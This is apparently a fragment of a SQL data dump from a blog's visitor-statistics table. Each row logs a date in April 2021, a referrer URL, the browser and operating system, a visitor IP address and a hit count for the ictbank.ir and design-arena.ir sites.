(10788,'2021-04-13','http://ictbank.ir/blog','UC Browser','Android','6.0.1',NULL,NULL,'','185.125.207.240','000',0,2,0),
(10789,'2021-04-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','82.102.22.91','000',0,2,0),
(10790,'2021-04-14','http://ictbank.ir/blog/wp-comments-post.php','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,1,0),
(10791,'2021-04-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(10792,'2021-04-14','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','165.231.33.108','000',0,2,0),
(10793,'2021-04-14','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(10794,'2021-04-14','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,1,0),
(10795,'2021-04-14','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','89.34.99.77','000',0,2,0),
(10796,'2021-04-14','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','178.158.231.159','000',0,1,0),
(10797,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.158','000',0,2,0),
(10798,'2021-04-14','http://ictbank.ir/blog','Yandex Browser','Windows','5.1',NULL,NULL,'','217.138.219.141','000',0,2,0),
(10799,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.158.72','000',0,1,0),
(10800,'2021-04-14','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','37.120.221.164','000',0,2,0),
(10801,'2021-04-14','http://ictbank.ir/blog','Unknown','FireOS','5',NULL,NULL,'','37.120.217.196','000',0,2,0),
(10802,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.13','000',0,2,0),
(10803,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.94.133','000',0,1,0),
(10804,'2021-04-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10805,'2021-04-14','http://ictbank.ir/blog','Instagram','iOS','11.4.1',NULL,NULL,'','176.222.34.111','000',0,2,0),
(10806,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.173.209.79','000',0,2,0),
(10807,'2021-04-14','https://www.startpage.com/','Firefox','Fedora','Unknown',NULL,NULL,'','84.139.232.71','000',0,1,0),
(10808,'2021-04-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(10809,'2021-04-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(10810,'2021-04-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10811,'2021-04-14','http://ictbank.ir/blog','Unknown','Android','9',NULL,NULL,'','185.169.233.45','000',0,2,0),
(10812,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(10813,'2021-04-14','http://ictbank.ir/blog','Safari','OS X','10.9.3',NULL,NULL,'','79.172.193.32','000',0,3,0),
(10814,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','91.132.147.168','000',0,3,0),
(10815,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','188.116.36.86','000',0,3,0),
(10816,'2021-04-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,12,0),
(10817,'2021-04-14','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','195.154.185.157','000',0,2,0),
(10818,'2021-04-14','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','185.253.98.102','000',0,2,0),
(10819,'2021-04-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','185.220.101.23','000',0,2,0),
(10820,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.56.80.65','000',0,1,0),
(10821,'2021-04-14','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','185.220.102.250','000',0,1,0),
(10822,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','178.250.157.177','000',0,2,0),
(10823,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.101.197','000',0,1,0),
(10824,'2021-04-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.220.101.214','000',0,1,0),
(10825,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.100.241','000',0,1,0),
(10826,'2021-04-14','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','201.210.143.167','000',0,3,0),
(10827,'2021-04-14','http://ictbank.ir/blog','Chrome','NetBSD','',NULL,NULL,'','110.138.84.218','000',0,3,0),
(10828,'2021-04-14','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.63.248.99','000',0,3,0),
(10829,'2021-04-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','217.138.219.164','000',0,2,0),
(10830,'2021-04-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.166.221.104','000',0,1,0),
(10831,'2021-04-15','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(10832,'2021-04-15','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','37.120.194.147','000',0,2,0),
(10833,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','130.185.74.247','000',0,3,0),
(10834,'2021-04-15','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','120.28.243.36','000',0,2,0),
(10835,'2021-04-15','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','5.239.155.106','000',0,1,0),
(10836,'2021-04-15','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','185.191.124.143','000',0,2,0),
(10837,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','109.70.100.33','000',0,1,0),
(10838,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.102.242','000',0,3,0),
(10839,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.195.166.162','000',0,3,0),
(10840,'2021-04-15','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','49.34.30.155','000',0,3,0),
(10841,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','182.2.165.127','000',0,3,0),
(10842,'2021-04-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,6,0),
(10843,'2021-04-15','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','86.106.103.29','000',0,2,0),
(10844,'2021-04-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10845,'2021-04-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(10846,'2021-04-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10847,'2021-04-15','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,1,0),
(10848,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.224.198','000',0,1,0),
(10849,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(10850,'2021-04-15','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','35.171.133.255','000',0,1,0),
(10851,'2021-04-15','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','89.196.71.141','000',0,1,0),
(10852,'2021-04-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.190.96.115','000',0,2,0),
(10853,'2021-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.72.108','000',0,1,0),
(10854,'2021-04-15','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.51.134','000',0,1,0),
(10855,'2021-04-15','http://www.ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,2,0),
(10856,'2021-04-15','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','51.255.164.109','000',0,2,0),
(10857,'2021-04-15','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','88.198.91.76','000',0,2,0),
(10858,'2021-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(10859,'2021-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(10860,'2021-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10861,'2021-04-15','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','95.208.198.103','000',0,1,0),
(10862,'2021-04-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','192.155.90.94','000',0,1,0),
(10863,'2021-04-15','http://ictbank.ir/blog','Safari','iOS','10.0.1',NULL,NULL,'','93.158.91.183','000',0,1,0),
(10864,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','13.58.56.77','000',0,6,0),
(10865,'2021-04-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,6,0),
(10866,'2021-04-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,2,0),
(10867,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.184.155.204','000',0,6,0),
(10868,'2021-04-16','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','98.169.117.45','000',0,1,0),
(10869,'2021-04-16','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.228.225.157','000',0,2,0),
(10870,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.38.172.12','000',0,1,0),
(10871,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.199.105.229','000',0,3,0),
(10872,'2021-04-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','13.59.93.1','000',0,2,0),
(10873,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.178.182.46','000',0,6,0),
(10874,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.124.254','000',0,1,0),
(10875,'2021-04-16','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','134.209.246.80','000',0,1,0),
(10876,'2021-04-16','http://www.google.com/','Chrome','Android','10',NULL,NULL,'','103.255.7.22','000',0,1,0),
(10877,'2021-04-16','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','13.124.222.242','000',0,6,0),
(10878,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.235.122','000',0,1,0),
(10879,'2021-04-16','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','47.88.35.240','000',0,2,0),
(10880,'2021-04-16','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','167.71.218.210','000',0,2,0),
(10881,'2021-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(10882,'2021-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(10883,'2021-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(10884,'2021-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10885,'2021-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10886,'2021-04-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10887,'2021-04-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(10888,'2021-04-17','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','52.64.20.252','000',0,12,0),
(10889,'2021-04-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','13.232.96.15','000',0,6,0),
(10890,'2021-04-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(10891,'2021-04-17','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.172','000',0,1,0),
(10892,'2021-04-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(10893,'2021-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.49.127','000',0,1,0),
(10894,'2021-04-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(10895,'2021-04-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(10896,'2021-04-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.60.189.115','000',0,6,0),
(10897,'2021-04-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10898,'2021-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.81.111','000',0,1,0),
(10899,'2021-04-17','https://www.google.com/','Chrome','Android','10',NULL,NULL,'','64.53.229.69','000',0,1,0),
(10900,'2021-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(10901,'2021-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10902,'2021-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10903,'2021-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10904,'2021-04-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(10905,'2021-04-18','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.254.152.28','000',0,1,0),
(10906,'2021-04-18','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','117.50.104.221','000',0,4,0),
(10907,'2021-04-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(10908,'2021-04-18','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','123.121.165.17','000',0,2,0),
(10909,'2021-04-18','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','163.172.70.215','000',0,1,0),
(10910,'2021-04-18','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,1,0),
(10911,'2021-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.241.77.13','000',0,6,0),
(10912,'2021-04-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10913,'2021-04-18','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.58.56.77','000',0,6,0),
(10914,'2021-04-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.143.142.242','000',0,1,0),
(10915,'2021-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.87.183','000',0,1,0),
(10916,'2021-04-18','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.172.197.238','000',0,9,0),
(10917,'2021-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(10918,'2021-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.213.215','000',0,1,0),
(10919,'2021-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10920,'2021-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(10921,'2021-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10922,'2021-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10923,'2021-04-18','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','5.121.28.204','000',0,1,0),
(10924,'2021-04-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','39.105.121.125','000',0,3,0),
(10925,'2021-04-18','http://ictbank.ir/blog','Android Browser','Android','1.5',NULL,NULL,'','220.181.77.162','000',0,4,0),
(10926,'2021-04-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','146.56.203.50','000',0,3,0),
(10927,'2021-04-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','113.3.216.35','000',0,3,0),
(10928,'2021-04-19','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','185.94.192.86','000',0,2,0),
(10929,'2021-04-19','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.222.113.120','000',0,1,0),
(10930,'2021-04-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,6,0),
(10931,'2021-04-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.211.194','000',0,1,0),
(10932,'2021-04-19','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','60.109.172.41','000',0,1,0),
(10933,'2021-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.185.4','000',0,2,0),
(10934,'2021-04-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(10935,'2021-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.10','000',0,2,0),
(10936,'2021-04-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(10937,'2021-04-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.175.232.168','000',0,1,0),
(10938,'2021-04-19','http://ictbank.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','90.29.11.42','000',0,2,0),
(10939,'2021-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.151.77','000',0,1,0),
(10940,'2021-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.151.33','000',0,1,0),
(10941,'2021-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(10942,'2021-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(10943,'2021-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(10944,'2021-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10945,'2021-04-19','https://google.com','Chrome','Linux','Unknown',NULL,NULL,'','89.248.168.140','000',0,2,0),
(10946,'2021-04-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(10947,'2021-04-20','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.145.96','000',0,1,0),
(10948,'2021-04-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','198.46.174.56','000',0,15,0),
(10949,'2021-04-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,4,0),
(10950,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.172.16','000',0,1,0),
(10951,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','13.233.73.212','000',0,6,0),
(10952,'2021-04-20','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','159.242.234.203','000',0,3,0),
(10953,'2021-04-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','13.58.56.77','000',0,6,0),
(10954,'2021-04-20','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
(10955,'2021-04-20','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','51.38.40.95','000',0,1,0),
(10956,'2021-04-20','https://duckduckgo.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','93.49.34.100','000',0,1,0),
(10957,'2021-04-20','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,2,0),
(10958,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.232.188.53','000',0,1,0),
(10959,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.210.92.249','000',0,8,0),
(10960,'2021-04-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(10961,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.241.178','000',0,1,0),
(10962,'2021-04-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10963,'2021-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10964,'2021-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(10965,'2021-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10966,'2021-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10967,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.232.96.15','000',0,6,0),
(10968,'2021-04-20','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','183.67.44.146','000',0,1,0),
(10969,'2021-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.3.142','000',0,1,0),
(10970,'2021-04-21','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','52.60.189.115','000',0,6,0),
(10971,'2021-04-21','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','5.211.55.197','000',0,1,0),
(10972,'2021-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.166.80.99','000',0,1,0),
(10973,'2021-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.99.32.246','000',0,1,0),
(10974,'2021-04-21','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','116.228.243.2','000',0,2,0),
(10975,'2021-04-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10976,'2021-04-21','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','23.98.154.25','000',0,1,0),
(10977,'2021-04-21','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.83.53.40','000',0,3,0),
(10978,'2021-04-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','176.58.104.76','000',0,1,0),
(10979,'2021-04-21','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','64.225.77.34','000',0,1,0),
(10980,'2021-04-21','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','74.201.160.9','000',0,139,0),
(10981,'2021-04-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','192.206.5.200','000',0,3,0),
(10982,'2021-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.91.78','000',0,1,0),
(10983,'2021-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.106.140','000',0,1,0),
(10984,'2021-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(10985,'2021-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(10986,'2021-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10987,'2021-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10988,'2021-04-21','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','195.154.182.201','000',0,2,0),
(10989,'2021-04-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10990,'2021-04-21','http://design-arena.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','192.36.70.176','000',0,1,0),
(10991,'2021-04-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.172.16','000',0,1,0),
(10992,'2021-04-22','http://webmail.design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,1,0),
(10993,'2021-04-22','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','51.79.167.205','000',0,2,0),
(10994,'2021-04-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,6,0),
(10995,'2021-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.241.71.170','000',0,2,0),
(10996,'2021-04-22','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','67.205.30.182','000',0,2,0),
(10997,'2021-04-22','http://ictbank.ir/blog','Chrome','Android','4.1.2',NULL,NULL,'','185.191.124.152','000',0,1,0),
(10998,'2021-04-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.153.197.37','000',0,1,0),
(10999,'2021-04-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.22.20.0','000',0,1,0),
(11000,'2021-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.158.166','000',0,1,0),
(11001,'2021-04-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11002,'2021-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.111.132','000',0,1,0),
(11003,'2021-04-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','44.233.0.10','000',0,1,0),
(11004,'2021-04-22','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','89.39.104.238','000',0,1,0),
(11005,'2021-04-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','74.201.160.9','000',0,1,0),
(11006,'2021-04-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.58','000',0,1,0),
(11007,'2021-04-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,2,0),
(11008,'2021-04-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(11009,'2021-04-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11010,'2021-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.15.203.156','000',0,1,0),
(11011,'2021-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.163.21','000',0,1,0),
(11012,'2021-04-23','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,1,0),
(11013,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','120.52.152.19','000',0,1,0),
(11014,'2021-04-23','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','120.52.152.20','000',0,1,0),
